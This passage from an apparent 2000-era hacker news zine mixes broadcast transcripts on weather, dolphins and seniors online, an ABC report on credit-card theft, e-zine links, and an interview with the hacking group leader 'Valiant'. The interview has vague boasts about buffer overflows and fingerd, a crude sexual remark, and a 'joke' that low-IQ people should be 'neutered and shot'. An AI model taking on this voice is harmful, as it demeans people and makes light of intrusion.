needed in the field of e-commerce. They see a conflict there between
protecting data and the need to make Web sites very easy and welcoming for
cyber-shoppers. But, says one of their new corporate partners, "If you can't
do security right, you can't do e- commerce right." "Mudge" agrees, and says
security should no longer be just walls built to keep people out, but an element
that makes everyone's job easier, from the warehouse to the delivery company
to the customer.
Coming up: from climate patterns to better weather detection, we'll tell with
you what's making waves.
(COMMERCIAL BREAK)
LOCKRIDGE: Some climate researchers think there's a big change going on
in the Pacific Ocean that could bring weird weather for the next 30 years.
They say unusual areas of warm and cold water may mean we're entering a
pattern called the Pacific Decadal Oscillation, which changes weather around
the world.
Anne McDermott has more.
(BEGIN VIDEOTAPE)
ANNE MCDERMOTT, CNN CORRESPONDENT (voice-over): Painting
the lawn: Another wacky California custom? Well, no. This was back in the
late '80s, when a drought burned up all the grass. Eventually, though, the
vegetable dye was washed away by El Nino. But it may be time to get out
that green dye again, because according to the experts, more drought is on the
way. And that's because of a natural recurring climate pattern over the
Pacific Ocean called Pacific Decadal Oscillation, or PDO for short.
Unlike El Nino, which only sticks around a year or two, PDO is a much bigger
phenomenon, and one that waxes and wanes over the course of 20 to 30
years. Scientists monitoring this PDO say it steers the jet stream over North
America and will result, they say, in lots more rain in the Northwest part of the
United States and less than normal rainfall in the Southern part of the country.
WILLIAM PATZERT, JPL OCEANOGRAPHER: When the Pacific speaks
with events like this, Pacific Decadal Oscillation, the United States definitely
listens.
MCDERMOTT: How severe droughts will be is by no means possible to
determine, but expect a renewed interest in those low-flow showerheads and
those water-skimping toilets. No one's forgotten rationing or the sacrifices.
UNIDENTIFIED MALE: Not being able to wash down my driveway and
wash my car.
MCDERMOTT: Now this PDO is not related to global warming, but its reach
may be global. Scientists say it's possible that the PDO played a part in the
terrible flooding in Venezuela last year and in those wind storms that battered
Europe late last month. But mostly, this climate pattern will affect the U.S.
In fact, it's already happening. Scientists say New England's long wait for that
first big snow is related to the PDO. Next up: well, at least some periods of
drought in some parts of the country, though it's unlikely it'll make anyone
yearn for the return of El Nino.
For SCIENCE & TECHNOLOGY WEEK, I'm Anne McDermott, CNN, Los
Angeles.
(END VIDEOTAPE)
LOCKRIDGE: If we're going to have strange weather in the next few years,
at least forecasters may be able to give us a bit more warning of what's
coming. The National Weather Service has a brand new computer, and
officials say it will make predictions faster and more accurate.
Natalie Pawelski reports.
(BEGIN VIDEOTAPE)
NATALIE PAWELSKI, CNN CORRESPONDENT (voice-over): Predicting
this week's snowstorms and bitter cold and forecasting the hurricanes and
tornadoes of warmer months has just gotten easier, says the National Weather
Service, thanks to a new supercomputer.
JACK KELLY, NATIONAL WEATHER SERVICE: We're starting off
today with a much -- a five-times-faster computer than we've had, and by
September, it will be about 28-times faster than the one we currently have. So.
we're able to do better simulations of the atmosphere.
PAWELSKI: The Weather Service says the new computer will give people
more lead time to prepare for severe storms, and it's designed to run
increasingly-complex forecasting models that predict what's coming with
ever-greater detail.
KELLY: What's that mean for everyone? It means more accurate forecasts,
longer-time forecasts and more accurate, both temperature, rain, you name it;
it's going to be better than what we've been able to do.
PAWELSKI: They say everybody talks about the weather but nobody does
anything about it. The new computer should allow people to talk about coming
weather further in advance. And while we still can't do anything about it, at
least we can be better prepared.
For SCIENCE & TECHNOLOGY WEEK, I'm Natalie Pawelski.
(END VIDEOTAPE) LOCKRIDGE: Coming up next: surfing the Web and
the water. We'll travel to Florida for a marine mammal mystery, then
introduce you to an older generation learning some new technology.
(COMMERCIAL BREAK)
LOCKRIDGE: Skywatchers with clear weather got a spectacular show on
Thursday night. A total lunar eclipse made the full moon glow an eerie shade
of red over North and South America. This was the first time in four years
that the Sun, Earth and Moon lined up just right to produce this kind of show.
It happens when the Earth's shadow blocks most of the Sun's rays from
lighting up the Moon. The next full lunar eclipse will be in July, and the best
viewing for that one will be from Asia and Australia.
Marine biologists in the Florida keys are trying to solve a mystery. Starting last
weekend, dozens of bottle-nosed dolphins began stranding themselves on tidal
flats. They included both healthy and sick animals, and scientists are trying to
figure out just what drove them so close to shore.
Reporter Mike Tobin, from our affiliate WSVN, has the story.
(BEGIN VIDEOTAPE)
MIKE TOBIN, WSVN REPORTER: Hours and hours of desperate,
exhaustive labor got rescuers to the point where they finally chased the
dolphin out into open water.
CHRIS BLANKENSHIP, MARINE BIOLOGIST: It's nice to see him go
offshore, but whether they get stranded again, we don't know.
TOBIN: Without warning, dolphins started coming ashore, not just on Long
Key, but on the west coast of Florida. These dolphins ran aground at
Aresnicker (ph) Bank, about five miles off Long Key. So necropsies are being
performed on all the dolphin that died to see if there was an illness or toxin
which caused this.
BRAD LANGE, LAYTON, FLORIDA FIRE DEPARTMENT: Something's
obviously going on. Right now, we're checking dolphins out, and hopefully we'll
know more later on.
TOBIN: There were two efforts going on in the water, one to nurse the ill,
exhausted or injured back into swimming shape, and two, to scare the healthy
dolphin into the open sea, but the first attempts at human chains were
unsuccessful. The healthy dolphin kept coming back. Then someone came up
with a theory that this was tightly knit pod of dolphin, and the sick ones were
calling for help.
BLANKENSHIP: Sometimes animals will, when they congregate together as
a family, if you get a couple of sick ones, and they have this feeling of
responsibility, at least in my mind, you know, they have to take care of the
animals that are sick.
TOBIN: So they moved the sick ones to a tank onshore, where they couldn't
communicate with the other dolphin. Sadly, one of those died when it was
moved.
DENISE JACKSON, WILDLIFE RESCUE: We have had scenarios that
once the injured and the sick ones died, the healthy ones did leave.
TOBIN: Then the volunteers formed a human chain again, this time with
kayakers in front. With buckets of fish on their legs, they would try to act like
the Pied Piper, tempting the dolphin out to sea. With all the people behind them
scaring the dolphin, the survivors made it to the open water, where they can't
be injured or trapped by the sharp corral the in the shallow water of the Keys.
LANGE: We consider this a great success because there could have been a
lot of them expired.
(END VIDEOTAPE)
LOCKRIDGE: That report from Mike Tobin, of our affiliate WSVN.
When you imagine a typical Internet user, you might think of a teenager
endlessly chatting with friends, or a young business tycoon checking stock
prices on a Palm Pilot.
But the Internet's not just for the young. As Don Knapp reports, it's keeping
some senior citizens young at heart.
(BEGIN VIDEOTAPE)
DAVID LANSDALE, GERIATRICS EXPERT: So let's go down one more,
push your enter key.
DON KNAPP, CNN CORRESPONDENT (voice-over): David Lansdale's
found a way to spark up the lives of the elderly. He gets them wired to the
Internet.
LANSDALE: Now one more. Now type "au."
UNIDENTIFIED FEMALE: I thought maybe I was through with life, I was
ready for a rocking chair because I was 86 years old, and I haven't found the
rocking chair yet.
KNAPP: The average age of Lansdale's students is around 68. All are in
nursing or assisted care homes. He used family relationships to introduce them
to the Web.
LANSDALE: Here they are in California, a family was back in New York.
The opportunity for them to connect, to cross that time and space, was an
incredibly-precious opportunity to them.
UNIDENTIFIED FEMALE: I hear you are so beautiful.
KNAPP: Lillian Sher (ph) dictates an e-mail to a newborn great
granddaughter. Working with one another, the seniors learn as a group, to both
master the Internet and overcome what Lansdale calls the maladies of the
institutionalized: loneliness, helplessness, boredom and cognitive decline.
MARY HARVEY, WEB SURFER: Bingo just doesn't appeal to me, but this
does. Believe me, this does.
(LAUGHTER)
KNAPP: Ninety-four year-old Ruth Hyman is a star pupil and an instructor.
RUTH HYMAN, INTERNET INSTRUCTOR: When I sent a letter to my
grandchildren, a great grandchildren, they hanged it up in their offices, just like
I used to hang their drawings on my refrigerator.
LANSDALE: There's a collective benefit, there is an element of -- a
tremendous element of therapy. And remember that we started as a support
group.
DIXON MOOREHOUSE, WEB SURFER: I just wished I was 15 years old
and getting to learn all this.
LANSDALE: The seniors call their weekly meetings Monday Night Live, and
many say it's given them new life.
HYMAN: Three years ago they told me I wasn't going to live, but I showed
them. I got on the Web and got work, and I worked ever since.
KNAPP: For SCIENCE & TECHNOLOGY WEEK, I'm Don Knapp.
(END VIDEOTAPE)
LOCKRIDGE: Thanks for joining us. I'm Rick Lockridge, in for Ann Kellan.
Next week: technology evolution and how it affects you. The digital age has
produced lots of new businesses and is threatening to kill off some old ones.
It's survival of the fittest, where the losers become techno-saurs. That's
coming up on the next SCIENCE AND TECHNOLOGY WEEK. We'll see
you then.
TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL
800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM
LOCATED AT www.fdch.com
-=-
ABC News;
By Bill Redeker
Jan. 22 Computer crime is on the rise. And as
more people start purchasing online, entrusting
their credit card numbers and other personal
details to the ether, many experts say it is time
to step up the battle for online security.
You dont even have to be a really knowledgeable
intruder, you can just use one of these tools that are out
there and break into a system, says Kathy Fithin of the
Computer Emergency Response Team at Carnegie Mellon
University in Pittsburgh. Last year the Response Team
received reports of more than 8,000 Internet attacks and
intrusions.
Connecticut-based CD Universe reported it received a
fax from a hacker describing himself as a 19-year-old from
Russia. The hacker offered to destroy the credit card files
he had accessed through a flaw in the software for
$100,000. When CD Universe passed up the offer, the
hacker retaliated by posting up to 25,000 numbers on a
Web site called Maxus Credit Card Pipeline.
Card Numbers Cause Alarm
Whats interesting about this case is the sheer scale of
the crime. The person claims to have 300,000 credit cards,
which is an enormous amount, says security expert Elias
Levy.
Discover Financial Services, Visa, MasterCard and
American Express are all working to get new cards to the
customers compromised by the Russian hacker.
The Maxus incident is bound to reignite consumer
concern over online security. At least 30 businesses are
compromised every day, according to ABCNEWS
research. The problem has led to a boom in computer
security firms.
@Stake, a security firm in Boston, went to the source
and hired eight of the most prominent hackers in the
country, a group called L0pht Heavy Industries. The L0pht
crew consider themselves gray-hat hackers. Unlike
black-hat hackers such as Maxus and white-hat vigilante
hackers who sabotage kiddie-porn sites, L0pht identifies
security flaws publicly then dares companies to fix them.
Several L0pht members have testified in Congress
about online security. Theyll be helping @Stake design
systems that even they cant penetrate.
I think we really understand how people break into
computer systems because we do it ourselves, said Weld
Pond, a L0pht member.
Hackers vs. hackers: it may be the face of the future.
@HWA
48.0 HNN: Jan 24: Several New Ezine Issues Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I really hoped to review at least one of these for this issue but
the sites are so damn slow or over crowded I couldn't reach them
so hopefully next issue i'll have some snippets/a review for you
- Ed
From HNN http://www.hackernews.com/
contributed by Armour, The Hex, and others
New editions of several underground e-zines have been
released. InET from Columbia in both English and
Spanish, Issue #1 of Hack in the Box, Quadcon #3 from
Australia and DataZine 0.01 from the folks at Datacore
have hit the streets. Get your copies now!
InET
http://www.warpedreality.com/inet
Hack In the Box
http://www.thelimit.net/hitb
Quadcon
http://landfill.bit-net.com/~quadcon/quadcon-3.txt
DataZine
http://www.tdcore.com
If anyone else manages to get through and wants to write a
review on these (or any other zine, even if its your own *G*)
go ahead and email it in and i'll post it in the zine. - Ed
Here's a taste of Quadcon by Amour from Australia (Issue #1)
****************************************************************************
***************************<-=- QuadCon -=->********************************
****************************************************************************
*************The Newsest Zine To Hit Australia And The World****************
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
============================================================================
December 1999 - Issue 1
============================================================================
Whats In This Issue:
# Halcon Hacker Valiant Gives QuadCon An Exclusive Interview And Some
Special Tips In Trying To Prevent Your Machine From Being Hacked
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Interview Of Valiant The Leader Of Halcon. | http://www.halcon.com.au
----------------------------------------------
BackGround:
Halcon was founded in 1993 as a Bulletin Board System and by 1996 had grown
to atleast ten members. Still growing, in October 1996 the group took on
the name Halcon Technologies and in 1997 Valiant registered a business name,
allowing them to register the halcon.com.au domain name. Although the group
was not widely known, on 22nd October 1999, Halcon was blamed for a massive
hack on the Australian Republican Movement website. Despite denials and
misquotations, the story was covered by news outlets, an example of which is
at the following URL:
http://www.halcon.com.au/arm0001.html
Following this incident, Halcon received massive amounts of publicity (most
of it was unwanted) and Valiant claims that Halcon has become the most
popular hacking group in Australia. It currently has 24 members and thousands
of supporters.
Having been misquoted once, Valiant has since denied all interviews to the press,
including an offer from Channel Nine. QuadCon is therefore proud to present
an exclusive, uncut interview with Valiant.
-------------------------------------------------------------------------------
The Interview
-------------
QuadCon: If you were a system administrator of a newly installed slackware
linux machine and you had 20 minutes to secure it what would you do?
Valiant: Go to all the available sites (www.halcon.com.au/links.html) that
cater for that, and quickly grab and install as many patches for
your software available. Close all services (especially fingerd)
that arn't needed, relocate telnet to a different port (I know it
breaches RFC's, but fuck it.) and make sure that you don't
adduser lamers. :)
QuadCon: What is the most common thing to hack to gain access to?
Valiant: Fingerd is the most exploitable feature on machines, the good old
crackers highway. Allthough these days it's neglected as a mode of
system penetration, also alot of sysadmins don't understand the point
of finger anymore and remove it anyway. As for hacking, the best
method available that I remember overusing would be a buffer overflow
in a certain software which makes calls to root. Flood the software,
bang, down it goes and you have root. :)
QuadCon: Does the name Halcon have any relavence to you and why did you choose
it for the name of the group?
Valiant: Halcon .. well, I chose that many years ago, so I can't really
remember why it was chosen, other than that it sounds funky. :P
QuadCon: How would you characterize the media coverage of you?
Valiant: Trivial and biased. They just want an 'evil hacker genious' who
brags about how he hacked NASA, they don't really like me as
basically I won't brag, and I prefer to explain how idiotic the
consumers are for purchasing fucked computers, etc, and other
consumer related problems.
QuadCon: What do you think about hacks done in your name--for instance, the
Australian Republican Movement hack?
Valiant: I wasn't expecting such media coverage on that topic, however they
have no evidence against me, and I have yet to admit to even being
born at this point in time. So fuck 'em all. :)
QuadCon: What's the biggest misconception perpetuated by Hollywood
cybermovies?
Valiant: There is no such thing as a hot female hacker named Acid Burn who has
pert tits and lips that would look very nice wrapped around my hard
disk. :)
QuadCon: In your own words, define hacker.
Valiant: There's two meanings. I fall into both. The code hacker, who lives
to program and does it the hard way, and the system hacker, who loves
finding exploitable features in systems to gain access, does so,
notifies the sysadmin and patches the hole.
QuadCon: What is your technical background. (Which platform do you prefer
PC/MAC? What is your online background? Do you do networking? Do you
know programming languages,etc.)
Valiant: At the moment my prefered operating system is Windows 98 due it's
usability and comprehensive system architecture, when it comes to
personal use, for industrial things such as networking, I prefer any
linux distribution. I am a PC user, allthough I have a few old Apple
Classics in my computer collection. I've been using the internet
through BBS gateways for ten or more years. I network when I have
to, but I used to work as a network engineer. As for programming
languages, I have a bad memory and generally have to 'relearn' things
when I need them, however it's more a refresh than a relearn. :)
QuadCon: I understand that hackers assume an online nickname to become known
by - how did you acquire your nickname?
Valiant: I was seven years old when I logged onto a BBS using an audio coupler
900 bps modem at a friends place. It asked for a handle, Valiant was
my current dungeons and dragons charracter, so I typed it in
sheepishly. I've been known by it ever since. :)
QuadCon: What do you portray system administrators are like?
Valiant: Fail-safe devices that take care of systems, that if programmed
correctly would never need human assistance. :)
QuadCon: What do you think of ALOC, another aussie hacking group?
Valiant: Who? :)
QuadCon: What currently is Halcon working on?
Valiant: Currently working on? We're currently working on the ultimate
encyclopeadia of how to be slothenly and lazy. :)
QuadCon: What would you like Halcon to be in the future?
Valiant: I don't know, that's a hard question really. I never wanted it to be
anything to begin with, time has just made it bigger than I ever
expected. Back when I was a kid and it first started, I never really
thought it would exceed a BBS group of users who were of the same
interests. Now it's allmost like a religious cult for some. :)
QuadCon: Who in the world do you dislike most?
Valiant: Anyone with an IQ under 110. :) 100 is average, so I like people a
tad over. The others should be neutered and shot. :)
QuadCon: Any last comments?
Valiant: I like being a cunt-rag.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Special Thanks
--------------